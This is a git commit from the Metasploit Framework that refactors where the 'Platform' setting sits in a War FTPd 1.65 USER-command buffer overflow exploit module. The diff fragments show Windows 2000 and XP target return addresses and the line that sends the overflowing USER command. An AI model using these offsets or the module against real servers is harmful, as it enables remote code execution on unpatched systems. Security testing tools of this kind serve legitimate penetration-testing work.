Use a default platform

git-svn-id: file:///home/svn/framework3/trunk@4475 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2007-02-26 10:46:52 +00:00
parent 36462709c6
commit 6fe02e7fd8
1 changed files with 2 additions and 5 deletions

View File

@ -1,5 +1,5 @@
##
# $Id:$
# $Id$
##
##
@ -50,13 +50,13 @@ class Exploits::Windows::Ftp::WarFtpd165User < Msf::Exploit::Remote
'ConnectionType' => "-find"
}
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows 2000 SP0-SP4 English',
{
'Platform' => 'win',
'Ret' => 0x750231e2 # ws2help.dll
},
],
@ -64,7 +64,6 @@ class Exploits::Windows::Ftp::WarFtpd165User < Msf::Exploit::Remote
[
'Windows XP SP0-SP1 English',
{
'Platform' => 'win',
'Ret' => 0x71ab1d54 # push esp, ret
}
],
@ -72,7 +71,6 @@ class Exploits::Windows::Ftp::WarFtpd165User < Msf::Exploit::Remote
[
'Windows XP SP2 English',
{
'Platform' => 'win',
'Ret' => 0x71ab9372 # push esp, ret
}
]
@ -89,7 +87,6 @@ class Exploits::Windows::Ftp::WarFtpd165User < Msf::Exploit::Remote
send_cmd( ['USER', buf] , false )
handler
disconnect
end